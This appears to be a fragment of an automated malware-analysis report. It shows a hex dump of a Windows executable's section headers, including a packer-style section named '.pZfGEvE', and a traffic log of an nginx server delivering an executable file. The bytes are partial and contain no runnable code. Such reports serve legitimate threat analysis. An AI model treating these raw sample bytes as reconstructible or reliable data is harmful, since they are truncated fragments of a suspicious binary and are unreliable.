00 00 c8 02 00 00 00 00 00 00 10 00 00 00 10 00 00 00 40 02 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 2f 00 00 04 00 00 5f f8 28 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 7c bc 2a 00 e0 00 00 00 00 50 03 00 1d a2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 20 02 00 00 10 00 00 00 1a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 10 00 00 00 30 02 00 00 0a 00 00 00 1e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 f0 00 00 00 40 02 00 00 62 00 00 00 28 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 20 00 00 00 30 03 00 00 04 00 00 00 8a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 00 b0 01 00 00 50 03 00 00 a4 01 00 00 8e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 20 00 00 00 00 05 00 00 14 00 00 00 32 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 10 00 00 00 20 05 00 00 02 00 00 00 46 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 80 25 00 00 30 05 00 00 7a 0d 00 00 48 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 70 5a 66 47 45 76 45 00 b0 04 00 00 b0 2a 00 00 a8 04 00 00 c2 10 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 61 64 61 74 61 00 00 00 10 00 00 00 60 2f 00
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Thu, 06 Jan 2022 07:10:07 GMTContent-Type: application/x-msdos-programContent-Length: 3573248Connection: closeLast-Modified: Wed, 05 Jan 2022 23:21:51 GMTETag: "368600-5d4de04c9d13b"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00